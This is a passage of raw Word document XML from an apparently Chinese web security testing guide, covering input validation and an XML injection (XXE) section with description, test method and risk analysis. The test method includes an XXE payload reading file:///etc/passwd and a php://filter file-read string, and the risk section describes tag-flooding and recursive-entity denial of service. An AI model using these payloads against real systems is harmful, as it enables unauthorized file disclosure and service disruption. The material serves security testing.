        <w:t>输入验证策略：严格遵守规范的可接受输入的白名单。拒绝没有严格遵守规范的任何输入，或者将其变换为严格遵守规范的内容。不要完全依赖于通过黑名单检测恶意或格式错误的输入。但是，黑名单可帮助检测潜在攻击，或者确定哪些输入由于格式严重错误而应直接拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="00007D28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC36BA6" w14:textId="18BA4A4A" w:rsidR="00B44623" w:rsidRPr="00007D28" w:rsidRDefault="00B44623" w:rsidP="00B44623">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="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145A0CE" w14:textId="1AEE3452" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="001A7A0B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc498434560"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="5A7FE06B" w14:textId="72B3040F" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="001A7A0B" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可扩展标记语言</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Extensible Markup Language, XML) </w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是标准通用标记语言</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SGML) </w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的子集，非常适合</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输。</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。发现目前一些普遍使用</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的场景中都存在一种古老的</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体注入漏洞，这可能导致较为严重的安全问题，使得攻击者可能可以任意访问服务器以及应用所在网络的任何资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA74D1" w14:textId="77777777" w:rsidR="000A144B" w:rsidRPr="00CA437D" w:rsidRDefault="001A7A0B" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过手工篡改网站中</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体中的头部，加入相关的读取文件或者是链接，或者是命令执行等，如</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file:///path/to/file.ext</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://url/file.ext</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php://filter/read=convert.base64-encode/resource=conf.php</w:t>
      </w:r>
      <w:r w:rsidR="000A144B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，类似如下代码所示：</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0A144B" w:rsidRPr="00CA437D" w14:paraId="69AFF7C3" w14:textId="77777777" w:rsidTr="003E6696">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F05396"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xml version="1.0" encoding="utf-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C37D48"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 xml:space="preserve">&lt;!DOCTYPE nsfocus-sec [  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AA9FA2F"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lastRenderedPageBreak/>
              <w:t>&lt;!ELEMENT methodname ANY &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65EFE4C4"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ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F28319C"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methodcall&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0403F190"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methodname&gt;&amp;xxe;&lt;/methodname&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2656C428"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methodcall&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59881D48" w14:textId="084D8E80" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="000A144B" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>篡改以后，如果可读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00EB2677" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件或者达到植入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00EB2677" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果，则说明存在该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B1013" w14:textId="77777777" w:rsidR="00436CB9" w:rsidRPr="00CA437D" w:rsidRDefault="00C24790" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00436CB9" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00436CB9" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击广泛用于</w:t>
      </w:r>
      <w:r w:rsidR="00436CB9" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00436CB9" w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的攻击。攻击方式主要有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5844A296" w14:textId="77777777" w:rsidR="00436CB9" w:rsidRPr="00CA437D" w:rsidRDefault="00436CB9" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用超长标签像</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;AAAAAAA/&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，多达</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者使用超多的属性像</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;AA a=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件本身标签所占用的资源通常比内容多，在数据和属性比较多时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件将变得非常庞大，给</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的传输和解析带来困难；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552127A" w14:textId="77777777" w:rsidR="00436CB9" w:rsidRPr="00CA437D" w:rsidRDefault="00436CB9" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归负载攻击，注入深层次的循环嵌套的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据，造成服务器上</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析器崩溃，造成系统计算资源耗尽而被</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dos </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AEB7A" w14:textId="089B8FD7" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="00436CB9" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部实体攻击，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;!Entityname SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的解析依赖</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libxml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libxml2.9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以前的版本默认支持并开启了外部实体的引用，服务端解析用户提交的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件时，未对</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件引用的外部实体（含外部普通实体和外部参数实体）做合适的处理，并且实体的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp://</w:t>
      </w:r>
